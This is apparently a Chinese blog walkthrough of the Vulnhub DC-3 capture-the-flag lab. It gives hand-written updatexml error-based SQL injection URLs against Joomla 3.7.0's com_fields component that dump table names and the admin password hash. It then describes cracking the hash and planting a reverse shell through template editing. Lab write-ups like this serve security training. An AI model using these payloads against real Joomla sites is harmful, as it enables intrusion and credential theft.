当前位置：首页 > news >正文

Vulnhub DC-3 --手搓sql

news 2026/5/11 23:02:09

DC-3

主机扫描

端口扫描

存在目录administrator

只开放80端口，访问页面

根据flag提示，只有一个flag，需要获取到root权限

访问扫描出的adminstrator页面

页面显示joomla

基于PHP和MySQL开发的开源内容管理系统（CMS）

查详细版本看是否有详细漏洞可利用

查询了下kali本身没有预装joomscan

需要安装git https://github.com/OWASP/joomscan.git

perl joomscan.pl -u 192.168.68.138

查看joomla3.7.0是否有可利用漏洞

Sql注入和跨站脚本攻击xss

用sql注入，没有登录用户xss用处不大

Updatexml报错注入然后使用的sqlmap

手搓

#爆数据库名

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,database()),1)

#爆破表名

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)

limit 90,1最后回显，88,1为#__users表

#爆表中列名

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(0x7e,(select column_name from information_schema.columns where table_name='#__users' limit 0,1),0x7e),1) ----怎么试都报错

可用嵌套

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 88,1) limit 4,1),0x7e),1)

得到password 关键字，猜测用户名字段为：username

#爆用户名密码

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(0x7e,substring((select concat(username,0x3a,password) from %23__users limit 0,1),1,30),0x7e),1)

31,30 61,30密码全部取出

admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

解密网站https://hashes.com/en/decrypt/hash 解密密码为：snoopy

登录网站

路径Extensions-Templates-Templates

新建添加反弹shell保存

扫描页面是有目录

http://192.168.68.138/templates/

显示页面编辑在templates的beez3

Kali上监听端口

尝试访问http://192.168.68.138/templates/beez3/html/test.php

拿到shell，查看系统版本